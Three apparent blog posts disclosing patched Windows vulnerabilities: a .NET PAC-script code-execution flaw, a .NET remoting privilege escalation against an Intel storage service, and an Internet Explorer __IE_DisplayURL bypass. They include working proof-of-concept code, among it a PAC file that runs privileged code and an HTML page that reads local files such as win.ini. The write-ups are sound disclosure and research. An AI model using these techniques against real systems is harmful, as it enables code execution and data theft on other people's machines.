Sunday 30 November 2014

Old .NET Vulnerability #1: PAC Script RCE (CVE-2012-4776)

This is the start of a very short series on some of my old .NET vulnerabilities which have been patched. Most of these issues have never been publicly documented, or at least there have been no PoCs made available. Hopefully it's interesting to some people.

The first vulnerability I'm going to talk about is CVE-2012-4776 which was fixed in MS12-074. It was an issue in the handling of Web Proxy Auto-Configuration scripts (PAC). It was one of the only times that MS has ever credited me with a RCE in .NET since they made it harder to execute .NET code from IE. Though to be fair making it harder might be partially my fault.

The purpose of a PAC script, if you've never encountered one before, is to allow a web client to run some proxy decision logic before it connects to a web server. An administrator can configure the script to make complex decisions on how outbound connections are made, for example forcing all external web sites through a gateway proxy but all Intranet connections go direct to the server. You can read all about it on Wikipedia and many other sites as well but the crucial thing to bear in mind is the PAC script is written in Javascript. The most basic PAC script you can create is as follows:
function FindProxyForURL(url, host) {
 // Always return no proxy setting
 return "DIRECT";
}
On Windows if you use the built-in HTTP libraries such as WinINET and WinHTTP you don't need to worry about these files yourself, but if you roll your own HTTP stack, like .NET does, you'd be on your own to reimplement this functionality. So when faced with this problem what to do? If you answered, "let's use a .NET implementation of Javascript" you'd be correct. Some people don't realise that .NET comes with its own implementation of Javascript (JScript for licensing reasons). It even comes with a compiler, jsc.exe, installed by default.

While I was having a look at .NET, evaluating anything interesting which asserts full trust permissions I came across the .NET PAC implementation. The following method is from the System.Net.VsaWebProxyScript class in the Microsoft.JScript assembly (some code removed for brevity):
[PermissionSet(SecurityAction.Assert, Name="FullTrust")]
public bool Load(Uri engineScriptLocation, string scriptBody, Type helperType)
{
    try
    {
        engine = new VsaEngine();
        engine.RootMoniker = "pac-" + engineScriptLocation.ToString();
        engine.Site = new VsaEngineSite(helperType);
        engine.InitNew();
        engine.RootNamespace = "__WebProxyScript";

        StringBuilder sb = new StringBuilder();
        sb.Append("[assembly:System.Security.SecurityTransparent()] ...");
        sb.Append("class __WebProxyScript { ... }\r\n");
        sb.Append(scriptBody);
        IVsaCodeItem item2 = engine.Items.CreateItem("SourceText", 
                   VsaItemType.Code, VsaItemFlag.None) as IVsaCodeItem;
        item2.SourceText = sb.ToString();

        if (engine.Compile())
        {
            engine.Run();
            scriptInstance = Activator.CreateInstance(
                 engine.Assembly.GetType("__WebProxyScript.__WebProxyScript"));
            CallMethod(scriptInstance, "SetEngine", new object[] { engine });
            return true;
        }
    }
    catch
    {
    }
    return false;
}
The code is taking the PAC script from the remote location as a string, putting it together with some boiler plate code to implement the standard PAC functions and compiling it to an assembly. This seems too good to be true from an exploit perspective. It was time to give it a try so I configured a simple .NET application with a PAC script by adding the following configuration to the application:
<configuration>
  <system.net>
    <defaultProxy>
   <proxy
  autoDetect="true"
  scriptLocation="http://127.0.0.1/test.js"
   />
    </defaultProxy>
  </system.net>
</configuration
Of course in a real-world scenario the application probably isn't going to be configured like this. Instead the proxy settings might be configured through WPAD, which is known to be spoofable or the system settings. When the application makes a connection using the System.Net.WebClient class it will load the PAC file from the scriptLocation and execute it. With a test harness ready let's try a few things:
import System;

function FindProxyForURL(url, host) {
 Console.WriteLine("Hello World!");
 return "DIRECT";
}
This printed out "Hello World!" as you'd expect, so we can compile and executing JScript.NET code. Awesome. So let's go for the win!
import System.IO;

function FindProxyForURL(url, host) {
 File.WriteAllText("test.txt", "Hello World!");
 return "DIRECT";
}
And... it fails, silently I might add :-( I guess we need to get to the bottom of this. When dealing with the internals of the framework I usually find it easiest to get WinDBG involved. All .NET frameworks come with a handy debugger extension, SOS, which we can use to do low-level debugging of .NET code. A quick tutorial, open the .NET executable in WinDBG and run the following two lines at the console.
sxe clr
sxe -c ".loadby sos mscorwks; gh" ld:mscorwks
What these lines do is set WinDBG to stop on a CLR exception (.NET uses Windows SEH under the hood to pass on exceptions) and adds a handler to load the SOS library when the DLL mscorwks gets loaded. This DLL is the main part of the CLR, we can't actually do any .NET debugging until the CLR is started. As a side note, if this was .NET 4 and above replace mscorwks with clr as that framework uses clr.dll as its main implementation.

Restarting the execution of the application we wait for the debugger to break on the CLR exception. Once we've broken into the debugger you can use the SOS command !pe to dump the current exception:


Well no surprises, we got a SecurityException trying to open the file we specified. Now at this point it's clear that the PAC script must be running in Partial Trust (PT). This isn't necessarily an issue as I still had a few PT escapes to hand, but would be nice not to need one. By dumping the call stack using the !clrstack command we can see that the original caller was System.Net.AutoWebProxyScriptWrapper. 

Looking at the class it confirms our suspicions of being run in PT. In the class' CreateAppDomain method it creates an Internet security AppDomain which is going to be pretty limited in permissions then initializes the System.Net.VsaWebProxyScript object inside it. As that class derives from MarshalByRefObject it doesn't leave the restricted AppDomain. Still in situations like this you shouldn't be disheartened, let's go back and look at how the assembly was being loaded into memory. We find it's being loaded from a byte array (maybe bad) but passing a null for the evidence parameter (awesome). As we can see in the remarks from Assembly.Load this is a problem:
When you use a Load method overload with a Byte[] parameter to load a COFF image, 
evidence is inherited from the calling assembly. This applies to the .NET Framework 
version 1.1 Service Pack 1 (SP1) and subsequent releases.
So what we end up with is an assembly which inherits its permissions from the calling assembly. The calling assembly is trusted framework code, which means our compiled PAC code is also trusted code. So why doesn't the file function work? Well you have to remember how security in AppDomains interact with the security stack walk when a demand for a permission is requested.

The transition between the trusted and the untrusted AppDomains acts as a PermitOnly security boundary. What this means is that even if every caller on the current stack is trusted, if no-one asserts higher permissions than the AppDomain's current set then a demand would fail as shown in the below diagram:



There are plenty of ways around this situation, in fact we'll see a few in my next post on this topic. But for now there's an easy way past this issue, all we need is something to assert suitable permissions for us while we run our code. Turns out it was there all along, the original Load method uses the attribute form of permission assertion to assert full trust.
[PermissionSet(SecurityAction.Assert, Name="FullTrust")]
We can get code to run in that method because the loading of the assembly will execute any global JScript code automatically, so a quick modification and we get privileged execution:
import System.IO;

File.WriteAllText("test.txt", "Hello World!");

function FindProxyForURL(url, host) { 
 return "DIRECT";
}
Why couldn't we have just done a new PermissionSet(PermissionState.Unrestricted).Assert() here? Well if you look at the code being generated for compilation it sets the SecurityTransparent assembly attribute. This tells the CLR that this code isn't allowed to elevate its permissions, but it's transparent to security decisions. If you have a trusted assembly which is transparent it doesn't effect the stack walk at all, but it also cannot assert higher permissions. This is why the assertion in the Load method was so important. Of course this assertion was what originally led me to finding the code in the first place.

Microsoft fixed this in two ways, first they "fixed" the JScript code to not execute under a privileged permission set as well as passing an appropriate evidence object to the Assembly load. And secondly they basically blocked use of JScript.NET by default (see the notes in the KB article here). If you ever find a custom implementation of PAC scripts in an application it's always worth a quick look to see what they're using.


Monday 24 November 2014

Stupid is as Stupid Does When It Comes to .NET Remoting

Finding vulnerabilities in .NET is something I quite enjoy, it generally meets my criteria of only looking for logic bugs. Probably the first research I did was into .NET serialization where I got some interesting results, and my first Blackhat USA presentation slot. One of the places where you could abuse serialization was in .NET remoting, which is a technology similar to Java RMI or CORBA to access .NET objects remotely (or on the same machine using IPC). Microsoft consider it a legacy technology and you shouldn't use it, but that won't stop people.

One day I came to the realisation that while I'd talked about how dangerous it was I'd never released any public PoC for exploiting it. So I decided to start writing a simple tool to exploit vulnerable servers, that was my first mistake. As I wanted to fully understand remoting to write the best tool possible I decided to open my copy of Reflector, that was my second mistake. I then looked at the code, sadly that was my last mistake.

TL;DR you can just grab the tool and play. If you want a few of the sordid details of CVE-2014-1806 and CVE-2014-4149 then read on.

.NET Remoting Overview

Before I can describe what the bug is I need to describe how .NET remoting works a little bit. Remoting was built into the .NET framework from the very beginning. It supports a pluggable architecture where you can replace many of the pieces, but I'm just going to concentrate on the basic implementation and what's important from the perspective of the bug. MSDN has plenty of resources which go into a bit more depth and there's always the official documentation MS-NRTP and MS-NRBF. A good description is available here.

The basics of .NET remoting is you have a server class which is derived from the MarshalByRefObject class.  This indicates to the .NET framework that this object can be called remotely. The server code can publish this server object using the remoting APIs such as RemotingConfiguration.RegisterWellKnownServiceType. On the client side a call can be made to APIs such as Activator.GetObject which will establish a transparent proxy for the Client. When the Client makes a call on this proxy the method information and parameters is packaged up into an object which implements the IMethodCallMessage interface. This object is sent to the server which processes the message, calls the real method and returns the return value (or exception) inside an object which implements the IMethodReturnMessage interface.

When a remoting session is constructed we need to create a couple of Channels, a Client Channel for the client and a Server Channel for the server. Each channel contains a number of pluggable components called sinks. A simple example is shown below:


The transport sinks are unimportant for the vulnerability. These sinks are used to actually transport the data in some form, for example as binary over TCP. The important things to concentrate on from the perspective of the vulnerabilities are the Formatter Sinks and the StackBuilder Sink.

Formatter Sinks take the IMethodCallMessage or IMethodReturnMessage objects and format their contents so that I can be sent across the transport. It's also responsible for unpacking the result at the other side. As the operations are asymmetric from the channel perspective there are two different formatter sinks, IClientChannelSink and IServerChannelSink.

While you can select your own formatter sink the framework will almost always give you a formatter based on the BinaryFormatter object which as we know can be pretty dangerous due to the potential for deserialization bugs. The client sink is implemented in BinaryClientFormatterSink and the server sink is BinaryServerFormatterSink.

The StackBuilder sink is an internal only class implemented by the framework for the server. It's job is to unpack the IMethodCallMessage information, find the destination server object to call, verify the security of the call, calling the server and finally packaging up the return value into the IMethodReturnMessage object.

This is a very high level overview, but we'll see how this all interacts soon.

The Exploit

Okay so on to the actual vulnerability itself, let's take a look at how the BinaryServerFormatterSink processes the initial .NET remoting request from the client in the ProcessMessage method:

IMessage requestMsg;

if (this.TypeFilterLevel != TypeFilterLevel.Full)
{
     set = new PermissionSet(PermissionState.None);
     set.SetPermission(
           new SecurityPermission(SecurityPermissionFlag.SerializationFormatter));
}
try
{
    if (set != null)
    {
        set.PermitOnly();
    }
    requestMsg = CoreChannel.DeserializeBinaryRequestMessage(uRI, requestStream, 
               _strictBinding, TypeFilterLevel);
}
finally
{
    if (set != null)
    {
         CodeAccessPermission.RevertPermitOnly();
    }
}
We can see in this code that the request data from the transport is thrown into the DeserializeBinaryRequestMessage. The code around it is related to the serialization type filter level which I'll describe later. So what's the method doing?
internal static IMessage DeserializeBinaryRequestMessage(string objectUri, 
              Stream inputStream, bool bStrictBinding, TypeFilterLevel securityLevel)
{
    BinaryFormatter formatter = CreateBinaryFormatter(false, bStrictBinding);
    formatter.FilterLevel = securityLevel;
    UriHeaderHandler handler = new UriHeaderHandler(objectUri);
    return (IMessage) formatter.UnsafeDeserialize(inputStream, 
              new HeaderHandler(handler.HeaderHandler));
}

For all intents and purposes it isn't doing a lot. It's passing the request stream to a BinaryFormatter and returning the result. The result is cast to an IMessage interface and the object is passed on for further processing. Eventually it ends up passing the message to the StackBuilder sink, which verifies the method being called is valid then executes it. Any result is passed back to the client.

So now for the bug, it turns out that nothing checked that the result of the deserialization was a local object. Could we instead insert a remote IMethodCallMessage object into the serialized stream? It turns out yes we can. Serializing an object which implements the interface but also derived from MarshalByRefObject serializes an instance of an ObjRef class which points back to the client.

But why would this be useful? Well it turns out there's a Time-of-Check Time-of-Use vulnerability if an attacker could return different results for the MethodBase property. By returning a MethodBase for Object.ToString (which is always allowed) as some points it will trick the server into dispatching the call. Now once the StackBuilder sink goes to dispatch the method we replace it with something more dangerous, say Process.Start instead. And you've just got arbitrary code to execute in the remoting service.

In order to actually exploit this you pretty much need to implement most of the remoting code manually, fortunately it is documented so that doesn't take very long. You can repurpose the existing .NET BinaryFormatter code to do most of the other work for you. I'd recommand taking a look at the github project for more information on how this all works.

So that was  CVE-2014-1806, but what about CVE-2014-4149? Well it's the same bug, MS didn't fix the TOCTOU issue, instead they added a call to RemotingServices.IsTransparentProxy just after the deserialization. Unfortunately that isn't the only way you can get a remote object from deserialization. .NET supports quite extensive COM Interop and as luck would have it all the IMessage interfaces are COM accessible. So instead of a remoting object we instead inject a COM implementation of the IMethodCallMessage interface (which ironically can be written in .NET anyway). This works best locally as they you don't need to worry so much about COM authentication but it should work remotely. The final fix was to check if the object returned is an instance of MarshalByRefObject, as it turns out that the transparent COM object, System.__ComObject is derived from that class as well as transparent proxies.

Of course if the service is running with a TypeFilterLevel set to Full then even with these fixes the service can still be vulnerable. In this case you can deserialize anything you like in the initial remoting request to the server. Then using reflecting object tricks you can capture FileInfo or DirectoryInfo objects which give access to the filesystem at the privileges of the server. The reason you can do this is these objects are both serializable and derive from MarshalByRefObject. So you can send them to the server serialized, but when the server tries to reflect them back to the client it ends up staying in the server as a remote object.

Real-World Example

Okay let's see this in action in a real world application. I bought a computer a few years back which had pre-installed the Intel Rapid Storage Technology drivers version 11.0.0.1032 (the specific version can be downloaded here). This contains a vulnerable .NET remoting server which we can exploit locally to get local system privileges. A note before I continue, from what I can tell the latest versions of these drivers no longer uses .NET remoting for the communication between the user client and the server so I've never contacted Intel about the issue. That said there's no automatic update process so if, like me you had the original insecure version installed well you have a trivial local privilege escalation on your machine :-(

Bringing up Reflector and opening the IAStorDataMgrSvc.exe application (which is the local service) we can find the server side of the remoting code below:

public void Start()
{
    BinaryServerFormatterSinkProvider serverSinkProvider
        new BinaryServerFormatterSinkProvider {
           TypeFilterLevel = TypeFilterLevel.Full
    };
    BinaryClientFormatterSinkProvider clientSinkProvider = new BinaryClientFormatterSinkProvider();
    IdentityReferenceCollection groups = new IdentityReferenceCollection();

    IDictionary properties = new Hashtable();
    properties["portName"] = "ServerChannel";
    properties["includeVersions"] = "false";
    mChannel = new IpcChannel(properties, clientSinkProvider, serverSinkProvider);
    ChannelServices.RegisterChannel(mChannel, true);
    mServerRemotingRef = RemotingServices.Marshal(mServer,
        "Server.rem", typeof(IServer));
    mEngine.Start();
}

So there's a few thing to note about this code, it is using IpcChannel so it's going over named pipes (reasonable for a local service). It's setting the portName to ServerChannel, this is the name of the named pipe on the local system. It then registers the channel with the secure flag set to True and finally it configures an object with the known name of Server.rem which will be exposed on the channel. Also worth nothing it is setting the TypeFilterLevel to Full, we'll get back to that in a minute.

For exploitation purposes therefore we can build the service URL as ipc://ServerChannel/Server.rem. So let's try sending it a command. In this case I had updated for the fix to CVE-2014-1806 but not for CVE-2014-4149 so we need to pass the -usecom flag to use a COM return channel.


Well that was easy, direct code execution at local system privileges. But of course if we now update to the latest version it will stop working again. Fortunately though I highlighted that they were setting the TypeFilterLevel to Full. This means we can still attack it using arbitrary deserialization. So let's try and do that instead:


In this case we know the service's directory and can upload our custom remoting server to the same directory the server executes from. This allows us to get full access to the system. Of course if we don't know where the server is we can still use the -useser flag to list and modify the file system (with the privileges of the server) so it might still be possible to exploit even if we don't know where the server is running from.

Mitigating Against Attacks

I can't be 100% certain there aren't other ways of exploiting this sort of bug, at the least I can't rule out bypassing the TypeFilterLevel stuff through one trick or another. Still there are definitely a few ways of mitigating it. One is to not use remoting, MS has deprecated the technology for WCF, but it isn't getting rid of it yet.

If you have to use remoting you could use secure mode with user account checking. Also if you have complete control over the environment you could randomise the service name per-deployment which would at least prevent mass exploitation. An outbound firewall would also come in handy to block outgoing back channels. 


Tuesday 11 November 2014

When's document.URL not document.URL? (CVE-2014-6340)

I don't tend to go after cross-origin bugs in web browsers, after all XSS* is typically far easier to find (*disclaimer*  I don't go after XSS either), but sometimes they're fun. Internet Explorer is a special case, most web browsers don't make much of a distinction between origins for security purpose but IE does. Its zone mechanisms can make cross-origin bugs interesting, especially when it interacts with ActiveX plugins. The origin *ahem* of CVE-2014-6340 came from some research into a site-locking ActiveX plugin. I decided to see if I could find a generic way of bypassing the site-lock and found a bug in IE which has existed since at least IE6.

Let's start with how an ActiveX control will typically site-lock, as in only allow the control to be interacted with if hosted on a page from a particular domain. When an ActiveX control is instantiated it's passed a "Site" object which represents the container of the ActiveX control. This might be through implementing IObjectWithSite::SetSite or IOleObject::SetClientSite. When passed the site object the well know way of getting the hosting page's URL is to call IHTMLDocument2::get_URL method with code similar to the following:
IOleClientSite* pOleClientSite;
IOleContainer* pContainer;

pOleClientSite->GetContainer(&pContainer);

IHTMLDocument2* pHtmlDoc;

pContainer->QueryInterface(IID_PPV_ARGS(&pHtmlDoc));

BSTR bstrURL;

pHtmlDoc->get_URL(&bstrURL);

// We now have the hosting URL.

Anything which is based on the published Microsoft site-locking template code does something similar. So we can conclude that for a site-locking ActiveX control the document.URL property is important. Even though this is a DOM property it's at the native code level so you can't use Javascript to override it. So I guess we need to dig into MSHTML to find out where the URL value comes from. Bringing up the function in IDA led me to the following:



One of the first things IHTMLDocument2::get_URL calls is CMarkup::GetMarkupPrintUri. But what's most interesting was if this returned successfully it exited the function with a successful return code. Of course if you look at the code flow it only enters that block of code if the markup document object returned from CDocument::Markup has bit 1 set at byte offset 0x31. So where does that get set? Well annoyingly 0x31 is hardly a rare number so doing an immediate search in IDA was a pain, still eventually I found where you could set it, it was in the IHTMLDocument4::put_media function:


Still clearly that function must be documented? Nope, not a bit of it:



Well I could go on but I'll cut the story short for sanity's sake. What the media property does is set whether the document's currently a HTML document or a Print template. It turns out this is an old property which probably should never be used, but is one of those things which's kept around for legacy purposes. As long as you convert the current document to a print template using the OLECMDID_SETPRINTTEMPLATE command to ExecWB on the web browser this code path will execute. 

The final step is working out how you influence the URL property. After a bit of digging you'll find the following code in CMarkup::FindMarkupPrintUri



Hmm well it seems to be reading the attribute __IE_DisplayURL from the top element of the document and retuning that as the URL. Okay let's try that, using something like XMLHttpRequest to see if we can read local files. For example:

<html __IE_DisplayURL="file:///c:/">
<body>
<h1>
PoC for IE_DisplayURL Issue</h1>
<object border="1" classid="clsid:8856f961-340a-11d0-a96b-00c04fd705a2" id="obj">NO OBJECT</object>
<script>
try {
 // Set document to a print template
 var wb = document.getElementById("obj").object;
 wb.ExecWB(51, 0, true);

 // Enable print media mode
 document.media = "print";

 // Read a local file
 var x = new ActiveXObject("msxml2.xmlhttp");
 x.open("GET", "file:///c:/windows/win.ini", false);
 x.send();
 alert(x.responseText);

 // Disable again to get scripting back (not really necessary)
 document.media = "screen";

} catch(e) {
 alert(e.message);
}
</script>
</body>
</html>
This example only work when running in the Intranet Zone because it requires the ability to script the web browser. Can it be done from Internet Zone? Probably ;-) In the end Microsoft classed this as an Information Disclosure, but is it? Well probably in a default installation of Windows. But mix in third-party ActiveX controls you have yourself the potential for RCE. Perhaps sit back with a cup of *Coffee* and think about what ActiveX controls might be interesting to play with ;-)